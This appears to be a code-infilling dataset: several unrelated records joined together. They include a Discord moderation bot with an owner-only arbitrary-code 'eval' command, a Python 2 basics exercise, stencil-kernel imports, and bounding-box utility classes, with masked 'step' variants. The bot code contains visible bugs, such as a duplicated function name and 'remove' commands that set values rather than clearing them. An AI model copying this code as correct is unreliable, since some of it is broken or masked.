intents=intents,\n help_command=None,\n case_insensitive=True\n)\n\nTHEME_COLOR = discord.Colour.blue()\n\n# Add Cogs\nbot.add_cog(Miscellaneous(bot, THEME_COLOR))\nbot.add_cog(ServerSettings(bot, THEME_COLOR))\nbot.add_cog(Moderator(bot, THEME_COLOR))\nbot.add_cog(AutoMod(bot, THEME_COLOR))\nbot.add_cog(Fun(bot, THEME_COLOR))\nbot.add_cog(Google(bot, THEME_COLOR))\n#bot.add_cog(Hangman(bot, THEME_COLOR))\n#bot.add_cog(RockPaperScissors(bot, THEME_COLOR))\n\nprevious_msg_sender_id = None\n\n\n@bot.event\nasync def on_ready():\n bot.loop.create_task(Data.auto_update_data())\n bot.loop.create_task(update_presence(bot, PREFIX))\n print(\"Bot is ready...\")\n\n@bot.event\nasync def on_guild_join(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(f\"Joined - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}\")\n@bot.event\nasync def on_guild_remove(guild):\n log_channel = bot.get_channel(773580297954394162)\n await log_channel.send(f\"Left - {guild.name}\\nServer ID - {guild.id}\\nOwner - {guild.owner}\")\n\n@bot.event\nasync def on_member_join(member):\n guild: discord.Guild = member.guild\n channels = guild.channels\n\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n\n print(f\"{member} has joined {guild} server...\")\n\n join_role = guild.get_role(data[\"join_role\"])\n if join_role is not None:\n await member.add_roles(join_role)\n\n # Welcome Message\n if data[\"welcome_msg\"] is None:\n server_wlcm_msg = f\"Welcome, {member.mention}, to the Official **{guild.name}** Server\"\n else:\n server_wlcm_msg = data[\"welcome_msg\"]\n server_wlcm_msg = server_wlcm_msg.replace(\n \"[mention]\", f\"{member.mention}\")\n\n # Welcome Channel\n wel_channel = None\n\n if data[\"welcome_channel\"] is None:\n for channel in channels:\n if str(channel).find(\"welcome\") != -1:\n wel_channel = channel\n break\n else:\n wel_channel = guild.get_channel(int(data[\"welcome_channel\"]))\n\n try:\n await wel_channel.send(server_wlcm_msg)\n except AttributeError:\n print(\"DEBUG: No welcome channel has been set or found.\")\n\n#Remove welcome channel\n@bot.command(name=\"remove_welcome\", aliases=['rwel', 'remwel'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome(ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n \n Data.server_data[str(ctx.guild.id)][\"welcome_channel\"] = channel\n await ctx.send(\"This server's welcome channel has been removed\")\n\n@bot.event\nasync def on_member_remove(member):\n guild = member.guild\n channels = guild.channels\n\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n data = Data.server_data[str(guild.id)]\n\n print(f\"{member} has left the {guild.name}...\")\n\n # Leave Message\n if data[\"leave_msg\"] is None:\n server_leave_msg = f\"Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server\"\n else:\n server_leave_msg = data[\"leave_msg\"]\n server_leave_msg = server_leave_msg.replace(\"[member]\", f\"{member}\")\n\n # Leave Channel\n lv_channel = None\n\n if data[\"leave_channel\"] is None:\n for channel in channels:\n if str(channel).find(\"bye\") != -1 or str(channel).find(\"leave\") != -1:\n lv_channel = channel\n break\n else:\n lv_channel = guild.get_channel(int(data[\"leave_channel\"]))\n\n try:\n await lv_channel.send(server_leave_msg)\n except AttributeError:\n print(\"DEBUG: No leave channel has been set or found.\")\n\n\n#Remove leave\n@bot.command(name=\"remove_leave\", aliases=['rleave', 'remleave'])\n@commands.has_guild_permissions(manage_guild=True)\nasync def remove_welcome( ctx, *, channel):\n if str(ctx.guild.id) not in Data.server_data:\n Data.server_data[str(ctx.guild.id)] = Data.create_new_data()\n \n Data.server_data[str(ctx.guild.id)][\"leave_channel\"] = channel\n await ctx.send(\"This server's leave channel has been Removed\")\n\n@bot.event\nasync def on_command_error(ctx, error):\n try:\n error = error.original\n except Exception:\n pass\n if type(error) is discord.ext.commands.errors.CommandNotFound:\n return\n elif type(error) is discord.ext.commands.errors.BadArgument:\n pass\n elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:\n pass\n elif type(error) is discord.ext.commands.errors.NoPrivateMessage:\n pass\n elif type(error) is discord.ext.commands.errors.MissingPermissions:\n pass\n elif type(error) is discord.ext.commands.errors.NotOwner:\n pass\n elif type(error) is discord.ext.commands.errors.CommandOnCooldown:\n pass\n elif type(error) is discord.ext.commands.errors.ChannelNotFound:\n pass\n elif type(error) is discord.ext.commands.errors.BadUnionArgument:\n pass\n elif type(error) is discord.ext.commands.errors.BotMissingPermissions:\n pass\n elif type(error) is discord.errors.Forbidden:\n error = \"I don't have permission to do that!\"\n else:\n print(f\"Error {type(error)}: {error}\")\n traceback.print_exception(\n type(error), error, error.__traceback__, file=sys.stderr\n )\n\n embed = discord.Embed(\n title='Error!',\n description='An unexpected error ocurred.\\\n Please report this to the dev.',\n )\n embed.add_field(\n name='Error Message:',\n value=f\"{type(error)}:\\n{error}\",\n inline=False\n )\n await ctx.send(f\"{error}\")\n\n\n# LABEL: Programming Commands\ndef insert_returns(body):\n # insert return stmt if the last expression is a expression statement\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n\n # for if statements, we insert returns into the body and the orelse\n if isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n\n # for with blocks, again we insert returns into the body\n if isinstance(body[-1], ast.With):\n insert_returns(body[-1].body)\n\n\n@bot.command(name='eval')\nasync def eval_fn(ctx, *, cmd):\n \"\"\"Evaluates input.\n Input is interpreted as newline seperated statements.\n If the last statement is an expression, that is the return value.\n Usable globals:\n - `bot`: the bot instance\n - `discord`: the discord module\n - `commands`: the discord.ext.commands module\n - `ctx`: the invokation context\n - `__import__`: the builtin `__import__` function\n Such that `>eval 1 + 1` gives `2` as the result.\n The following invokation will cause the bot to send the text '9'\n to the channel of invokation and return '3' as the result of evaluating\n >eval ```\n a = 1 + 2\n b = a * 2\n await ctx.send(a + b)\n a\n ```\n \"\"\"\n if ctx.message.author.id not in [400857098121904149, 733532987794128897]:\n await ctx.send(\"You are not authorized to run this command\")\n return\n\n fn_name = \"_eval_expr\"\n\n cmd = cmd.strip(\"` \")\n\n # add a layer of indentation\n cmd = \"\\n\".join(f\" {i}\" for i in cmd.splitlines())\n\n # wrap in async def body\n body = f\"async def {fn_name}():\\n{cmd}\"\n\n parsed = ast.parse(body)\n body = parsed.body[0].body\n\n insert_returns(body)\n\n env = {\n 'bot': ctx.bot,\n 'discord': discord,\n 'commands': commands,\n 'ctx': ctx,\n '__import__': __import__\n }\n exec(compile(parsed, filename=\"<ast>\", mode=\"exec\"), env)\n\n result = (await eval(f\"{fn_name}()\", env))\n await ctx.send(result)\n\n\n# LABEL: Debugging Commands\n@bot.command(name=\"data\")\nasync def data(ctx):\n is_owner = await bot.is_owner(ctx.author)\n if is_owner or ctx.author.id == 733532987794128897: # for real sparta\n data_file = discord.File(\"data.json\")\n await ctx.send(file=data_file)\n\n\n@bot.event\nasync def on_message(message: discord.Message):\n global previous_msg_sender_id\n\n if message.author.bot:\n return\n\n author: discord.Member = message.author\n channel: discord.TextChannel = message.channel\n guild: discord.Guild = message.guild\n # print(str(author), \": \", message.content)\n\n await bot.process_commands(message)\n\n if str(guild.id) not in Data.server_data:\n Data.server_data[str(guild.id)] = Data.create_new_data()\n\n data = Data.server_data[str(guild.id)]\n\n if message.content.replace('!', '') == bot.user.mention:\n pre = data[\"prefix\"]\n await channel.send(f\"The prefix in this server is `{pre}`\")\n\n for afk_user_entry in data[\"afks\"]:\n afk_user_id = int(afk_user_entry[\"user\"])\n afk_reason = afk_user_entry[\"reason\"]\n afk_user = guild.get_member(afk_user_id)\n\n if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:\n Data.server_data[str(guild.id)][\"afks\"].remove(afk_user_entry)\n await channel.send(f\"**{afk_user}** is no longer AFK.\")\n\n elif afk_user in message.mentions:\n await channel.send(f\"**{afk_user}** is currently AFK because **{afk_reason}**.\")\n\n if data[\"pay_respects\"] and message.content.strip().lower() == \"f\":\n await channel.send(f\"**{author.display_name}** has paid their respects...\")\n\n if data[\"active\"] and str(author.id) not in data[\"users\"]:\n if not str(channel.id) in data[\"channels\"]:\n perms = author.permissions_in(channel)\n if not perms.administrator:\n if \"http://\" in message.content or \"https://\" in message.content:\n if len(data[\"urls\"]) > 0:\n for url in data[\"urls\"]:\n if not url in message.content:\n await channel.purge(limit=1)\n msg1 = await channel.send(f\"{author.mention}, you are not allowed to send links in this channel.\")\n await asyncio.sleep(2)\n await msg1.delete()\n else:\n await channel.purge(limit=1)\n msg2 = await channel.send(f\"{author.mention}, you are not allowed to send links in this channel.\")\n await asyncio.sleep(3)\n await msg2.delete()\n\n elif len(message.attachments) > 0:\n await channel.purge(limit=1)\n msg3 = await channel.send(f\"{author.mention}, you are not allowed to send attachments in this channel.\")\n await asyncio.sleep(3)\n await msg3.delete()\n\n previous_msg_sender_id = author.id\n\n\nbot.run(TOKEN)\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
#! /usr/bin/python
import glo
print glo.x
a = "hello world"
print id(a)
a = "ni hao"
print id(a)
for y in range(0, 5, 2):
print y
for y in 1, 2, 3:
print y
if (glo.x == 2):
print("a==2")
else:
print("a!=2")
tuple_name = ("name", "age", "school") #can't modify, only-read
list_name = ["boy", "girl"] #can modify
dict_name = {"a":"hello", "b":"world"}
def fun_hello(a=0, b=1):
print("hello everybody")
print(a)
print(b)
fun_hello()
class MyClass:
common=5
def fun_sum(self, m, n):
print(m+n)
mySum = MyClass()
mySum.fun_sum(11, 22)
mySum001 = MyClass()
print(mySum.common)
print(mySum001.common)
MyClass.common = 1000
print(mySum.common)
print(mySum001.common)
mySum.common = 9999
print(mySum.common)
print(mySum001.common)
class Student(MyClass):
def fun_age(self, d):
print(d)
stu = Student()
stu.fun_age(100)
stu.fun_sum(100, 200)
f = file("sayHello.txt", "w")
f.write("hello girls")
f.close()
section = "hello boys"
print(section[2:6]) #llo
|
normal
|
{
"blob_id": "17326597d0597d16717c87c9bdf8733fb3acb77b",
"index": 7943,
"step-1": "#! /usr/bin/python\n\nimport glo\nprint glo.x\n\na = \"hello world\"\nprint id(a)\n\na = \"ni hao\"\nprint id(a)\n\nfor y in range(0, 5, 2):\n print y\n\nfor y in 1, 2, 3:\n print y\n\nif (glo.x == 2):\n print(\"a==2\")\nelse:\n print(\"a!=2\")\n\ntuple_name = (\"name\", \"age\", \"school\") #can't modify, only-read\nlist_name = [\"boy\", \"girl\"] #can modify\ndict_name = {\"a\":\"hello\", \"b\":\"world\"}\n\ndef fun_hello(a=0, b=1):\n print(\"hello everybody\")\n print(a)\n print(b)\nfun_hello()\n\nclass MyClass:\n common=5\n def fun_sum(self, m, n):\n print(m+n)\nmySum = MyClass()\nmySum.fun_sum(11, 22)\n\nmySum001 = MyClass()\nprint(mySum.common)\nprint(mySum001.common)\nMyClass.common = 1000\nprint(mySum.common)\nprint(mySum001.common)\nmySum.common = 9999\nprint(mySum.common)\nprint(mySum001.common)\n\nclass Student(MyClass):\n def fun_age(self, d):\n print(d)\nstu = Student()\nstu.fun_age(100)\nstu.fun_sum(100, 200)\n\n\nf = file(\"sayHello.txt\", \"w\")\nf.write(\"hello girls\")\nf.close()\n\nsection = \"hello boys\"\nprint(section[2:6]) #llo\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
"""Stencil based grid operations in 2D."""
from .advection_flux_2d import gen_advection_flux_conservative_eno3_pyst_kernel_2d
from .advection_timestep_2d import (
gen_advection_timestep_euler_forward_conservative_eno3_pyst_kernel_2d,
)
from .brinkmann_penalise_2d import (
gen_brinkmann_penalise_pyst_kernel_2d,
gen_brinkmann_penalise_vs_fixed_val_pyst_kernel_2d,
)
from .char_func_from_level_set_2d import (
gen_char_func_from_level_set_via_sine_heaviside_pyst_kernel_2d,
)
from .diffusion_flux_2d import gen_diffusion_flux_pyst_kernel_2d
from .diffusion_timestep_2d import gen_diffusion_timestep_euler_forward_pyst_kernel_2d
from .elementwise_ops_2d import (
gen_add_fixed_val_pyst_kernel_2d,
gen_elementwise_complex_product_pyst_kernel_2d,
gen_elementwise_copy_pyst_kernel_2d,
gen_elementwise_sum_pyst_kernel_2d,
gen_set_fixed_val_at_boundaries_pyst_kernel_2d,
gen_set_fixed_val_pyst_kernel_2d,
gen_elementwise_saxpby_pyst_kernel_2d,
)
from .inplane_field_curl_2d import gen_inplane_field_curl_pyst_kernel_2d
from .outplane_field_curl_2d import gen_outplane_field_curl_pyst_kernel_2d
from .penalise_field_boundary_2d import gen_penalise_field_boundary_pyst_kernel_2d
from .update_vorticity_from_velocity_forcing_2d import (
gen_update_vorticity_from_penalised_velocity_pyst_kernel_2d,
gen_update_vorticity_from_velocity_forcing_pyst_kernel_2d,
)
|
normal
|
{
"blob_id": "2dddee735e23e8cdb7df83f47f63926727cf8963",
"index": 2731,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfrom .advection_flux_2d import gen_advection_flux_conservative_eno3_pyst_kernel_2d\nfrom .advection_timestep_2d import gen_advection_timestep_euler_forward_conservative_eno3_pyst_kernel_2d\nfrom .brinkmann_penalise_2d import gen_brinkmann_penalise_pyst_kernel_2d, gen_brinkmann_penalise_vs_fixed_val_pyst_kernel_2d\nfrom .char_func_from_level_set_2d import gen_char_func_from_level_set_via_sine_heaviside_pyst_kernel_2d\nfrom .diffusion_flux_2d import gen_diffusion_flux_pyst_kernel_2d\nfrom .diffusion_timestep_2d import gen_diffusion_timestep_euler_forward_pyst_kernel_2d\nfrom .elementwise_ops_2d import gen_add_fixed_val_pyst_kernel_2d, gen_elementwise_complex_product_pyst_kernel_2d, gen_elementwise_copy_pyst_kernel_2d, gen_elementwise_sum_pyst_kernel_2d, gen_set_fixed_val_at_boundaries_pyst_kernel_2d, gen_set_fixed_val_pyst_kernel_2d, gen_elementwise_saxpby_pyst_kernel_2d\nfrom .inplane_field_curl_2d import gen_inplane_field_curl_pyst_kernel_2d\nfrom .outplane_field_curl_2d import gen_outplane_field_curl_pyst_kernel_2d\nfrom .penalise_field_boundary_2d import gen_penalise_field_boundary_pyst_kernel_2d\nfrom .update_vorticity_from_velocity_forcing_2d import gen_update_vorticity_from_penalised_velocity_pyst_kernel_2d, gen_update_vorticity_from_velocity_forcing_pyst_kernel_2d\n",
"step-3": "\"\"\"Stencil based grid operations in 2D.\"\"\"\nfrom .advection_flux_2d import gen_advection_flux_conservative_eno3_pyst_kernel_2d\nfrom .advection_timestep_2d import (\n gen_advection_timestep_euler_forward_conservative_eno3_pyst_kernel_2d,\n)\nfrom .brinkmann_penalise_2d import (\n gen_brinkmann_penalise_pyst_kernel_2d,\n gen_brinkmann_penalise_vs_fixed_val_pyst_kernel_2d,\n)\nfrom .char_func_from_level_set_2d import (\n gen_char_func_from_level_set_via_sine_heaviside_pyst_kernel_2d,\n)\nfrom .diffusion_flux_2d import gen_diffusion_flux_pyst_kernel_2d\nfrom .diffusion_timestep_2d import gen_diffusion_timestep_euler_forward_pyst_kernel_2d\nfrom .elementwise_ops_2d import (\n gen_add_fixed_val_pyst_kernel_2d,\n gen_elementwise_complex_product_pyst_kernel_2d,\n gen_elementwise_copy_pyst_kernel_2d,\n gen_elementwise_sum_pyst_kernel_2d,\n gen_set_fixed_val_at_boundaries_pyst_kernel_2d,\n gen_set_fixed_val_pyst_kernel_2d,\n gen_elementwise_saxpby_pyst_kernel_2d,\n)\nfrom .inplane_field_curl_2d import gen_inplane_field_curl_pyst_kernel_2d\nfrom .outplane_field_curl_2d import gen_outplane_field_curl_pyst_kernel_2d\nfrom .penalise_field_boundary_2d import gen_penalise_field_boundary_pyst_kernel_2d\nfrom .update_vorticity_from_velocity_forcing_2d import (\n gen_update_vorticity_from_penalised_velocity_pyst_kernel_2d,\n gen_update_vorticity_from_velocity_forcing_pyst_kernel_2d,\n)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
class Box:
def __init__(self, id, capacity):
self.id = id
self.dogs = []
self.capacity = capacity
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Box:
def __init__(self, id, capacity):
self.id = id
self.dogs = []
self.capacity = capacity
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def remove_dog(self, dog):
if self.status > 0:
self.dogs.remove(dog)
return True
else:
return False
<|reserved_special_token_1|>
class Box:
def __init__(self, id, capacity):
self.id = id
self.dogs = []
self.capacity = capacity
@property
def status(self):
return len(self.dogs)
<|reserved_special_token_0|>
def remove_dog(self, dog):
if self.status > 0:
self.dogs.remove(dog)
return True
else:
return False
<|reserved_special_token_1|>
class Box:
def __init__(self, id, capacity):
self.id = id
self.dogs = []
self.capacity = capacity
@property
def status(self):
return len(self.dogs)
def add_dog(self, dog):
if self.capacity > self.status:
self.dogs.append(dog)
return True
else:
return False
def remove_dog(self, dog):
if self.status > 0:
self.dogs.remove(dog)
return True
else:
return False
|
flexible
|
{
"blob_id": "5f24c5a21dc151e9efbbfaff0fe1e71e65d1eb67",
"index": 1590,
"step-1": "class Box:\n\n def __init__(self, id, capacity):\n self.id = id\n self.dogs = []\n self.capacity = capacity\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "class Box:\n\n def __init__(self, id, capacity):\n self.id = id\n self.dogs = []\n self.capacity = capacity\n <mask token>\n <mask token>\n\n def remove_dog(self, dog):\n if self.status > 0:\n self.dogs.remove(dog)\n return True\n else:\n return False\n",
"step-3": "class Box:\n\n def __init__(self, id, capacity):\n self.id = id\n self.dogs = []\n self.capacity = capacity\n\n @property\n def status(self):\n return len(self.dogs)\n <mask token>\n\n def remove_dog(self, dog):\n if self.status > 0:\n self.dogs.remove(dog)\n return True\n else:\n return False\n",
"step-4": "class Box:\n\n def __init__(self, id, capacity):\n self.id = id\n self.dogs = []\n self.capacity = capacity\n\n @property\n def status(self):\n return len(self.dogs)\n\n def add_dog(self, dog):\n if self.capacity > self.status:\n self.dogs.append(dog)\n return True\n else:\n return False\n\n def remove_dog(self, dog):\n if self.status > 0:\n self.dogs.remove(dog)\n return True\n else:\n return False\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
DotExporter(webtest).to_picture('webtest.png')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
webtest = Node('WebappTest')
registration = Node('Registration', parent=webtest)
smsconfirm = Node('SMSconfirm', parent=registration)
login = Node('Login', parent=smsconfirm)
useruploadCV = Node('UserUploadCV', parent=login)
usermatchJD = Node('UserMatchJD', parent=useruploadCV)
bemember = Node('BeMember', parent=login)
addprj = Node('AddProject', parent=bemember)
memuploadCV = Node('MemberUploadCV', parent=addprj)
memupfollowupCV = Node('MemberFollowupCV', parent=memuploadCV)
previewCV = Node('PreviewCV', parent=memuploadCV)
addbid = Node('AddBidding', parent=addprj)
modbid = Node('ModifyBidding', parent=addbid)
addcus = Node('AddCustomer', parent=addbid)
addJD = Node('AddJD', parent=addcus)
JDmatchCV = Node('JDmatchCV', parent=addJD)
JDmatchCVMultiDB = Node('JDmatchCVMultiDB', parent=JDmatchCV)
previewMatchCV = Node('previewMatchCV', parent=JDmatchCVMultiDB)
CVraderChart = Node('CVraderChart', parent=JDmatchCVMultiDB)
<|reserved_special_token_0|>
DotExporter(webtest).to_picture('webtest.png')
<|reserved_special_token_1|>
from anytree import Node, RenderTree
webtest = Node('WebappTest')
registration = Node('Registration', parent=webtest)
smsconfirm = Node('SMSconfirm', parent=registration)
login = Node('Login', parent=smsconfirm)
useruploadCV = Node('UserUploadCV', parent=login)
usermatchJD = Node('UserMatchJD', parent=useruploadCV)
bemember = Node('BeMember', parent=login)
addprj = Node('AddProject', parent=bemember)
memuploadCV = Node('MemberUploadCV', parent=addprj)
memupfollowupCV = Node('MemberFollowupCV', parent=memuploadCV)
previewCV = Node('PreviewCV', parent=memuploadCV)
addbid = Node('AddBidding', parent=addprj)
modbid = Node('ModifyBidding', parent=addbid)
addcus = Node('AddCustomer', parent=addbid)
addJD = Node('AddJD', parent=addcus)
JDmatchCV = Node('JDmatchCV', parent=addJD)
JDmatchCVMultiDB = Node('JDmatchCVMultiDB', parent=JDmatchCV)
previewMatchCV = Node('previewMatchCV', parent=JDmatchCVMultiDB)
CVraderChart = Node('CVraderChart', parent=JDmatchCVMultiDB)
from anytree.exporter import DotExporter
DotExporter(webtest).to_picture('webtest.png')
<|reserved_special_token_1|>
#!/usr/bin/env python
from anytree import Node, RenderTree
webtest = Node("WebappTest")
registration = Node("Registration", parent=webtest)
smsconfirm = Node("SMSconfirm", parent=registration)
login = Node("Login", parent=smsconfirm)
useruploadCV = Node("UserUploadCV", parent=login)
usermatchJD = Node("UserMatchJD", parent=useruploadCV)
bemember = Node("BeMember", parent=login)
addprj = Node("AddProject", parent=bemember)
memuploadCV = Node("MemberUploadCV", parent=addprj)
memupfollowupCV = Node("MemberFollowupCV", parent=memuploadCV)
previewCV = Node("PreviewCV", parent=memuploadCV)
addbid = Node("AddBidding", parent=addprj)
modbid = Node("ModifyBidding", parent=addbid)
addcus = Node("AddCustomer", parent=addbid)
addJD = Node("AddJD", parent=addcus)
JDmatchCV = Node("JDmatchCV", parent=addJD)
JDmatchCVMultiDB = Node("JDmatchCVMultiDB", parent=JDmatchCV)
previewMatchCV = Node("previewMatchCV", parent=JDmatchCVMultiDB)
CVraderChart = Node("CVraderChart", parent=JDmatchCVMultiDB)
from anytree.exporter import DotExporter
DotExporter(webtest).to_picture("webtest.png")
|
flexible
|
{
"blob_id": "33ac328b2bf16380b50c58013bd0d4d888dc3952",
"index": 4693,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nDotExporter(webtest).to_picture('webtest.png')\n",
"step-3": "<mask token>\nwebtest = Node('WebappTest')\nregistration = Node('Registration', parent=webtest)\nsmsconfirm = Node('SMSconfirm', parent=registration)\nlogin = Node('Login', parent=smsconfirm)\nuseruploadCV = Node('UserUploadCV', parent=login)\nusermatchJD = Node('UserMatchJD', parent=useruploadCV)\nbemember = Node('BeMember', parent=login)\naddprj = Node('AddProject', parent=bemember)\nmemuploadCV = Node('MemberUploadCV', parent=addprj)\nmemupfollowupCV = Node('MemberFollowupCV', parent=memuploadCV)\npreviewCV = Node('PreviewCV', parent=memuploadCV)\naddbid = Node('AddBidding', parent=addprj)\nmodbid = Node('ModifyBidding', parent=addbid)\naddcus = Node('AddCustomer', parent=addbid)\naddJD = Node('AddJD', parent=addcus)\nJDmatchCV = Node('JDmatchCV', parent=addJD)\nJDmatchCVMultiDB = Node('JDmatchCVMultiDB', parent=JDmatchCV)\npreviewMatchCV = Node('previewMatchCV', parent=JDmatchCVMultiDB)\nCVraderChart = Node('CVraderChart', parent=JDmatchCVMultiDB)\n<mask token>\nDotExporter(webtest).to_picture('webtest.png')\n",
"step-4": "from anytree import Node, RenderTree\nwebtest = Node('WebappTest')\nregistration = Node('Registration', parent=webtest)\nsmsconfirm = Node('SMSconfirm', parent=registration)\nlogin = Node('Login', parent=smsconfirm)\nuseruploadCV = Node('UserUploadCV', parent=login)\nusermatchJD = Node('UserMatchJD', parent=useruploadCV)\nbemember = Node('BeMember', parent=login)\naddprj = Node('AddProject', parent=bemember)\nmemuploadCV = Node('MemberUploadCV', parent=addprj)\nmemupfollowupCV = Node('MemberFollowupCV', parent=memuploadCV)\npreviewCV = Node('PreviewCV', parent=memuploadCV)\naddbid = Node('AddBidding', parent=addprj)\nmodbid = Node('ModifyBidding', parent=addbid)\naddcus = Node('AddCustomer', parent=addbid)\naddJD = Node('AddJD', parent=addcus)\nJDmatchCV = Node('JDmatchCV', parent=addJD)\nJDmatchCVMultiDB = Node('JDmatchCVMultiDB', parent=JDmatchCV)\npreviewMatchCV = Node('previewMatchCV', parent=JDmatchCVMultiDB)\nCVraderChart = Node('CVraderChart', parent=JDmatchCVMultiDB)\nfrom anytree.exporter import DotExporter\nDotExporter(webtest).to_picture('webtest.png')\n",
"step-5": "#!/usr/bin/env python\n\nfrom anytree import Node, RenderTree\n\n\nwebtest = Node(\"WebappTest\")\nregistration = Node(\"Registration\", parent=webtest)\nsmsconfirm = Node(\"SMSconfirm\", parent=registration)\nlogin = Node(\"Login\", parent=smsconfirm)\nuseruploadCV = Node(\"UserUploadCV\", parent=login)\nusermatchJD = Node(\"UserMatchJD\", parent=useruploadCV)\nbemember = Node(\"BeMember\", parent=login)\naddprj = Node(\"AddProject\", parent=bemember)\nmemuploadCV = Node(\"MemberUploadCV\", parent=addprj)\nmemupfollowupCV = Node(\"MemberFollowupCV\", parent=memuploadCV)\npreviewCV = Node(\"PreviewCV\", parent=memuploadCV)\naddbid = Node(\"AddBidding\", parent=addprj)\nmodbid = Node(\"ModifyBidding\", parent=addbid)\naddcus = Node(\"AddCustomer\", parent=addbid)\naddJD = Node(\"AddJD\", parent=addcus)\nJDmatchCV = Node(\"JDmatchCV\", parent=addJD)\nJDmatchCVMultiDB = Node(\"JDmatchCVMultiDB\", parent=JDmatchCV)\npreviewMatchCV = Node(\"previewMatchCV\", parent=JDmatchCVMultiDB)\nCVraderChart = Node(\"CVraderChart\", parent=JDmatchCVMultiDB)\n\n\nfrom anytree.exporter import DotExporter\nDotExporter(webtest).to_picture(\"webtest.png\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class RBox:
def __init__(self):
self.x = 0
self.y = 0
self.w = 0
self.h = 0
@staticmethod
def fromClassicalBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[1]
rbox.w = box[2]
rbox.h = box[3]
return rbox
@staticmethod
def fromClassicalBoundingBoxes(boxes):
return [RBox.fromClassicalBoundingBox(box) for box in boxes]
@staticmethod
def fromRoughBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[2]
rbox.h = box[1] - box[0]
rbox.w = box[3] - box[2]
return rbox
@staticmethod
def fromPointBoundingBox(box):
rbox = RBox()
rbox.x = box[0][0]
rbox.y = box[0][1]
rbox.w = box[1][0] - box[0][0]
rbox.h = box[1][1] - box[0][1]
return rbox
@staticmethod
def fromPointBoundingBoxes(boxes):
return [RBox.fromPointBoundingBox(box) for box in boxes]
def classicalBoundingBox(self):
return [self.x, self.y, self.w, self.h]
def pointBoundingBox(self):
return (self.x, self.y), (self.x + self.w, self.y + self.h)
def area(self):
return self.h * self.w
def __or__(self, other_box):
rbox = RBox()
rbox.x = min(self.x, other_box.x)
rbox.y = min(self.y, other_box.y)
rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y
return rbox
def __and__(self, other_box):
rbox = RBox()
rbox.x = max(self.x, other_box.x)
rbox.y = max(self.y, other_box.y)
rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y
if rbox.w < 0 or rbox.h < 0:
rbox = RBox()
return rbox
def similarity(self, other_box):
min_area = min(self.area(), other_box.area())
return (self & other_box).area() / min_area
def __str__(self):
return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)
def __mul__(self, other_box):
return self.similarity(other_box)
def __eq__(self, other):
return (self.x == other.x and self.y == other.y and self.w == other
.w and self.h == other.h)
@staticmethod
def similarityStats(boxes):
sim_mat = np.array(boxes).reshape((-1, 1))
sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)
return sim_mat
@staticmethod
def similarityThreshold(boxes, threshold=0.8):
sim_mat = RBox.similarityStats(boxes)
ind = np.array(np.nonzero(sim_mat > threshold))
return list(ind.T)
@staticmethod
def reduceBoxes(boxes, threshold=0.8):
similar_boxes = RBox.similarityThreshold(boxes, threshold)
while len(similar_boxes) > 0:
union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][1]]
boxes.append(union)
similar_boxes = RBox.similarityThreshold(boxes, threshold)
return boxes
@staticmethod
def toPointBoundingBoxes(boxes):
return [box.pointBoundingBox() for box in boxes]
@staticmethod
def toClassicBoundingBoxes(boxes):
return [box.classicalBoundingBox() for box in boxes]
def extractPatchFromImage(self, image, square=False):
start, end = self.pointBoundingBox()
start, end = list(start), list(end)
if square:
im_h, im_w = image.shape[0:2]
if self.h != self.w:
if self.h > self.w:
diff = self.h - self.w
if start[0] >= int(diff / 2):
start[0] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[0]
start[0] = 0
end[0] += diff
if end[0] >= im_w:
diff = end[0] - im_w + 1
end[1] -= diff
else:
diff = self.w - self.h
if start[1] >= int(diff / 2):
start[1] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[1]
start[1] = 0
end[1] += diff
if end[1] >= im_h:
diff = end[1] - im_h + 1
end[0] -= diff
return image[start[1]:end[1], start[0]:end[0]]
def addPatchtoImage(self, image, patch):
start, end = self.pointBoundingBox()
image[start[1]:end[1], start[0]:end[0]] = patch
return image
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def find_bounding_box(binary_matrix, margins=(0, 0)):
indicies = np.array(np.nonzero(binary_matrix + 0))
ys = margins[1] + np.amin(indicies[0])
ye = margins[1] + np.amax(indicies[0])
